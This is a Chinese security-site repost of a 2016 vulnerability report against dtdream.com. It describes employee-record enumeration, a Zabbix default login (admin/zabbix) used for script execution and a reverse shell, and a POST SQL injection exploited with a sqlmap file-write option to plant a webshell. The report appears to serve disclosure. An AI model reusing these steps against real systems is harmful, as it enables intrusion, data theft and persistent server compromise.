频道栏目
首页 > 资讯 > 企业安全 > 正文

数梦工场科技漏洞一枚(员工信息遍历/SQL注入getshell/反弹内网)

16-07-19        来源:[db:作者]  
收藏   我要投稿

数梦工场位于美丽的云栖小镇.西湖区.杭州。数梦工场基于阿里飞天平台为各行业做云计算和大数据的场景化开发和服务。

我们的愿景是用最卓越的数据技术, 去实现最美好的梦想。

我们钟爱有执行力、有想法、有故事、甚至想拯救世界的你,不管是什么,只要有梦想,何不来同我们玩耍,一起用数据技术做点有意义的事情。

数梦工场

1、

员工信息遍历

http://www.dtdream.com/pub/e_card/00001.html

 

8.png

 

ceo信息 然后只有00001~09999遍历即可

2、

zabbix

http://monitor.dtdream.com

guest 未禁用

admin/zabbix 默认口令

添加脚本 执行下:

 

QQ20160518-0@2x.png

 

 

QQ20160518-1@2x.png

 

 

1.png

 

可以直接反弹 创业不易 不深入先

3、

SQL注入 getshell

http://pms.dtdream.com/coop/login/loginProcess/ investor_pwd=1&investor_name=1

POST注入

web application technology: PHP 5.4.45, Nginx

back-end DBMS: MySQL >= 5.0.0

有http://pms.dtdream.com/test.php 有了路径

直接

--file-write "./t.php" --file-dest "/var/www/html/t.php"

写shell

 

9.png

 

ok

先这样.

rt

解决方案:

相关TAG标签
上一篇:斗鱼TV某处SSRF漏洞
下一篇:申通快递某系统存在XXE SQL注入
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站